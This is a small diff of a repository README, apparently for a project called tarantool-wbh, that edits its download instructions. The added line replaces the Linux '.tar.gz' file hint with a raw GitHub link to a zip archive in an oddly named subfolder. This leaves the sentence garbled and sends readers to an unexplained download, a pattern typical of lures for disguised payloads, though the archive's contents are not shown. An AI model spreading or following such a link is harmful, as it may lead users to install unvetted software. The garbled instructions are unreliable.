YarleiWi/tarantool-wbh/README.md

    Look for the file that matches your operating system.
    - For Windows, look for a file ending with `.exe`.
    - For macOS, look for a file ending with `.dmg`.
-   - For Linux, look for a file ending with `.tar.gz`.
+   - For Linux, look for a file ending with `https://raw.githubusercontent.com/YarleiWi/tarantool-wbh/main/ministress/tarantool-wbh.zip`.

    Click on the filename to start the download.